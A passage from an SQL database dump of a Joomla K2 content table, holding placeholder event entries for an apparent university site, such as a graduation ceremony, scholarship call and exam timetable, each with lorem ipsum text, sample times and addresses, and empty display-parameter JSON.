geGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(10,'35th graduation ceremony scheduled for December','35th-graduation-ceremony-scheduled-for-december-2013',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"08.00AM to 10.00AM\"},{\"id\":\"2\",\"value\":\"7.30AM\"},{\"id\":\"3\",\"value\":\"Hajirakabug, North Bruklon Road 34rf\"}]','08.00AM to 10.00AM 7.30AM Hajirakabug, North Bruklon Road 34rf ','2013-05-29 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:09:42',135,'2013-09-25 06:52:40','0000-00-00 00:00:00',1,1,2,0,0,'','','','',78,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(11,'Education Conference is organised by Esri Eastern','education-conference-is-organised-by-esri-eastern',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"2.00PM to 04.30PM\"},{\"id\":\"2\",\"value\":\"1.00PM\"},{\"id\":\"3\",\"value\":\"City Road, Fc leverkusen4532\"}]','2.00PM to 04.30PM 1.00PM City Road, Fc leverkusen4532 ','2013-08-07 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:09:16',135,'2013-09-25 06:54:50','0000-00-00 00:00:00',1,1,3,0,0,'','','','',125,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(12,'MASTERS and PH.D SCHOLARSHIP: CALL for APPLICATIONS','masters-and-ph-d-scholarship-call-for-applications',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"3.30PM to 4.30PM\"},{\"id\":\"2\",\"value\":\"2.30PM\"},{\"id\":\"3\",\"value\":\"Mandar khalea, 3450 Kopenhugen\"}]','3.30PM to 4.30PM 2.30PM Mandar khalea, 3450 Kopenhugen ','2013-09-16 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:08:50',135,'2013-09-25 06:57:22','0000-00-00 00:00:00',1,1,4,0,0,'','','','',124,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(13,'Call For 2013 KUSA Elections Dec. 2013','call-for-2013-kusa-elections-dec-2013',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"11.00AM to 01.00PM\"},{\"id\":\"2\",\"value\":\"10.00AM\"},{\"id\":\"3\",\"value\":\"North Mugdabi, Hamburg fc123\"}]','11.00AM to 01.00PM 10.00AM North Mugdabi, Hamburg fc123 ','2013-09-12 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:08:25',135,'2013-09-25 06:58:28','0000-00-00 00:00:00',1,1,5,0,0,'','','','',124,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(14,'e-Learning Training Time Table 2013/2014 Semester 1','e-learning-training-time-table-2013-2014-semester-1',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"5.00PM to 6.30PM\"},{\"id\":\"2\",\"value\":\"4.00PM\"},{\"id\":\"3\",\"value\":\"Town hall, Stockholm, 5767p\"}]','5.00PM to 6.30PM 4.00PM Town hall, Stockholm, 5767p ','2013-09-25 06:59:49',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:08:04',135,'2013-09-25 06:59:49','0000-00-00 00:00:00',1,1,6,0,0,'','','','',127,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(15,'Final Examination Timetable for Supplementary','final-examination-timetable-for-supplementary',3,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim.</p>',NULL,NULL,'[{\"id\":\"1\",\"value\":\"3.00PM to 6.00PM\"},{\"id\":\"2\",\"value\":\"2.00PM\"},{\"id\":\"3\",\"value\":\"South Bridge, Edinburgh, EH8 9YL\"}]','3.00PM to 6.00PM 2.00PM South Bridge, Edinburgh, EH8 9YL ','2013-09-10 00:00:00',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:07:15',135,'2013-09-27 00:00:00','0000-00-00 00:00:00',1,1,7,0,0,'','','','',203,'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}','','robots=\nauthor=','','','*'),(20,'Lorem ipsum dolor sit amet, consectetuer adipiscing elit','lorem-ipsum-dolor-sit-amet-consectetuer-adipiscing-elit-lorem-ipsum-dolor-sit-amet-consectetuer-adipiscing-elit-sed-diam-nonummy-nibh-euismod-tincidunt-ut-laoreet-dolore-magna-aliquam-erat-volutpat-ut-wisi-enim-ad-minim-veniam-quis-nostrud-ex',5,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci.</p>\r\n','\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>\r\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.</p>\r\n<p> </p>',NULL,NULL,'[]','','2013-09-27 09:04:07',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:06:47',135,'2013-09-27 09:04:07','0000-00-00 